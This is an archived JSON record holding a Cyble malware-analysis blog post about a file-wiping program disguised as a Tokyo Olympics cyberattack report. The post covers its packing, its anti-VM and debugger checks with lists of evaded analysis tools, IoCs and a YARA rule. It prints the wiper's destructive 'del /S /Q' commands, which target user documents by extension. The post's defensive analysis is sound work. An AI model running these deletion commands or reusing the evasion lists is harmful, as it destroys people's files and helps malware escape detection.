{
	"id": "15a07357-5fa0-4f72-9617-594434876ee5",
	"created_at": "2026-04-06T02:13:09.816168Z",
	"updated_at": "2026-04-10T13:12:27.001106Z",
	"deleted_at": null,
	"sha1_hash": "92d00aa618fcfd35b40346913b905e3a16d27096",
	"title": "Analysis of Wiper Malware Disguised as Tokyo Olympics Doc",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1031851,
	"plain_text": "Analysis of Wiper Malware Disguised as Tokyo Olympics Doc\r\nBy cybleinc\r\nPublished: 2021-08-02 · Archived: 2026-04-06 01:29:16 UTC\r\nRead Cyble's research on new variant of the Wiper malware that is disguised as a Tokyo Olympics document.\r\nRecently, Cyble Research Labs came across a new malware sample on the surface web. The malware in\r\nquestion belongs to the Wiper family. The sample was posted by a security researcher\r\non Twitter. From VirusTotal, we learned that the original name of the malware is【至急】東京オリンピック開\r\n催に伴うサイバー攻撃等発生に関する被害報告について.exe. The translation of the file name is “[Urgent]\r\nAbout the damage report about the occurrence of cyber-attacks etc. accompanying the Tokyo Olympics\r\n.exe”.  \r\nIn this case, the name of the sample suggests that it could be used to leverage the interest surrounding\r\nthe Tokyo Olympics.  \r\nThe Wiper malware family has been created with the intent to delete selected documents\r\ncontaining extensions that are predefined in the malware by the Threat\r\nActor (TA). Figure 1 showcases the complete execution flow of the Wiper malware. \r\nSee Cyble in Action\r\nWorld's Best AI-Native Threat Intelligence\r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 1 of 9\n\nFigure 1 Wiper Malware Execution Flow\r\nTechnical Analysis \r\nThe static analysis of the malware indicated that it is packed using Ultimate Packer for Executables (UPX), an\r\nopen-source executable packer that supports various file formats across operating systems. After unpacking the\r\nmalware, we found that it is an x86 architecture console-based application. It was developed using C/C++\r\nlanguage and compiled on “2021-07-20 06:52:05”. These details are shown in Figure 1. The malware also uses an\r\nAdobe PDF icon to trick unsuspecting users into opening the malware.  \r\nFigure 2: Malware’s Static Details\r\nBased on our initial observations, Cyble researchers found that the malware doesn’t perform\r\nany other activities apart from deleting itself from the victim’s device. Similarly, we can see in Figure 3, that the\r\nmalware executes the “Del” command to delete itself. \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 2 of 9\n\nFigure 3: Wiper Malware’s Process Tree\r\nCode Analysis \r\nOur research indicates that the TA behind the malware has added multiple anti-VM/anti-debugging/AntiSandBox techniques, as shown in Figure 4, These techniques include checking for ProcMon, VM\r\nDetection, Debugger Detection, Sleep, and EnumWindows etc. \r\nFigure 4: Code to Detect VM and Debugger\r\nUsing EnumWindows API Call, the malware checks if any strings mentioned in Table 1 are\r\nmatching any running processes in the top-level application titles to check whether any malware analysis\r\ntools are running in the background. \r\nPROCMON_WINDOW_CLASS \r\nOllyDbg \r\nTIdaWindow \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 3 of 9\n\nWinDbgFrameClass \r\nFilemonClass \r\nID \r\nRegmonClass \r\nPROCEXPL \r\nTCPViewClass \r\nSmartSniff \r\nAutoruns \r\nCNetmonMainFrame \r\nTFormFileAlyzer2 \r\nProcessHacker \r\nTable 1 Running Process String\r\nOur research indicates that the Wiper malware also checks for the processes shown in Table 2 to determine if it is\r\nrunning in any malware analysis environment. In case these processes are running, the malware exits and deletes\r\nitself.\r\nWireshark.exe \r\napateDNS.exe \r\nAutoruns.exe \r\nbindiff.exe \r\nidaq.exe \r\nidaq64.exe \r\nProcmon.exe \r\nx64dbg.exe \r\nx32dbg.exe \r\nollydbg.exe \r\nImmunityDebugger.exe \r\nVBoxTray.exe \r\nVBoxService.exe \r\nmsedge.exe \r\nVirtualBox.exe \r\njavaw.exe \r\nx96dbg.exe \r\nidaw.exe \r\nwindbg.exe \r\ndnSpy.exe \r\nHxD.exe \r\nScylla_x64.exe \r\nScylla_x86.exe \r\nregmon.exe \r\nprocexp.exe \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 4 of 9\n\nprocexp64.exe \r\nTcpview.exe \r\nsmsniff.exe \r\nFakeNet.exe \r\nnetmon.exe \r\nPEiD.exe \r\nLordPE.exe \r\nPE-bear.exe \r\nPPEE.exe \r\ndie.exe \r\ndiel.exe \r\npexplorer.exe \r\ndepends.exe \r\nResourceHacker.exe \r\nFileAlyzer2.exe \r\nprocesshacker.exe \r\nRegshot-x64-Unicode.exe \r\nTable 2:  Process List\r\nFigure 5 shows the malware comparing the running processes with the process list. \r\nFigure 5: Process Comparison\r\nThe malware also checks whether any soft breakpoint has been added on a VMDetection method or not, as shown\r\nin Figure 6. \r\nFigure 6 Code to check soft breakpoints\r\nThe TA has added the above checks to ensure that the malware runs on the physical device and not on any\r\nmalware analysis environment. If any one of the checks is positive, the malware exits and deletes itself. \r\nOnce all the checks are done, the malware executes a series of commands to delete the files that have\r\nthe extension specified by the TA in the malware, as shown in Figure 7. \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 5 of 9\n\nFigure 7: Malware Executing Command to Delete *.doc Files \r\nThe series of commands used to delete files that have the extensions specified by the TA are given in Table 3.\r\ndel /S /Q *.doc c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.docm c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.docx c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.dot c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.dotm c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.dotx c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.pdf c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.csv c:\\\\users\\\\%username%\\\\  \u003e nul \r\ndel /S /Q *.xls c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.xlsx c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.xlsm c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *. ppt c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.pptx c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *. pptm c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.jtdc c:\\\\users\\\\% username% \\\u003e nul \r\ndel /S /Q *.jttc c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.jtd c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.jtt c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.txt c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.exe c:\\\\users\\\\%username%\\\\ \u003e nul \r\ndel /S /Q *.log c:\\\\users\\\\%username%\\\\ \u003e nul \r\nTable 3: Commands Executed by Malware\r\nAs we can see in Table 3, the malware checks for several file extensions including .jtd, which is an extension for a\r\nJapanese word processor. \r\nOnce it executes all the commands given in Table 3, it runs the curl command to access an adult website.\r\nHowever, the intent of this behavior is unknown. \r\nFigure 8 shows the execution of the curl command to access the adult website.  \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 6 of 9\n\nFigure 8: Curl Command Execution \r\nThe malware self-destructs after completing all the activities discussed above.  \r\nConclusion  \r\nBased on the name of malware executable file, “[Urgent] About the damage report about the occurrence of\r\ncyber–attacks etc. accompanying the Tokyo Olympics .exe”, and the fact that the malware\r\nchecks for. jtd extensions, we suspect that it has been potentially created to leverage the recent interest around\r\nthe Tokyo Olympics. \r\nThe TA provided this malware with the functionality to delete files that have extensions specified by the TA. It\r\ndoes not demonstrate any other behavior that is generally displayed by malware. \r\nCyble Research Labs is continuously monitoring security threats, whether they are ongoing or emerging.\r\nWe will continue to update our readers with our latest findings. \r\nOur Recommendations \r\nWe have listed some of the essential cybersecurity best practices that create the first line of control against\r\nattackers. We recommend that our readers follow the suggestions given below: \r\nUse strong passwords and enforce multi-factor authentication wherever possible. \r\nTurn on the automatic software update feature on your computer, mobile, and other connected devices\r\nwherever possible and pragmatic.  \r\nUse a reputed anti-virus and Internet security software package on your connected devices, including PC,\r\nlaptop, and mobile.     \r\nRefrain from opening untrusted links and email attachments without verifying their authenticity. \r\nConduct regular backup practices and keep those backups offline or in a separate network. \r\nMITRE ATT\u0026CK® Techniques:\r\nTactic  Technique ID  Technique Name \r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 7 of 9\n\nExecution  T1204  User Execution\r\nDefense  T1497  Virtualization/Sandbox Evasion \r\nImpact  T1485  Data Destruction \r\nIndicators of Compromise (IoCs):\r\nIndicators \r\nIndicator\r\ntype \r\nDescription \r\nfb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97  Hash  SHA-256 \r\n295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f  Hash  SHA-256 \r\nGeneric Signatures and Rules \r\nYara Rules\r\nrule win32_tokyoolympicdeleter\r\n{\r\nmeta:\r\nauthor= \"Cyble Research\"\r\ndate= \"2021-08-03\"\r\ndescription= \"Coverage for Malware targeting Tokyo Olympics\"\r\nhash= \"fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97\"\r\nstrings:\r\n$header= \"MZ\"\r\n$sig1 = \"meClassOFilemon\" wide ascii\r\n$sig2 = \"iewSmartSniffg\" wide ascii\r\n$sig3 = \"TFormFileAlyzer2\" wide ascii\r\n$sig4 = \"TIdaWindow\" wide ascii\r\n condition:\r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 8 of 9\n\n$header at 0 and (2 of ($sig*))\r\n}\r\nAbout Us \r\nCyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and\r\nexposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk\r\nfootprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as\r\none of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with\r\noffices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble,\r\nvisit www.cyble.com.  \r\nSource: https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/"
	],
	"report_names": [
		"a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document"
	],
	"threat_actors": [],
	"ts_created_at": 1775441589,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.pdf",
		"text": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.txt",
		"img": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.jpg"
	}
}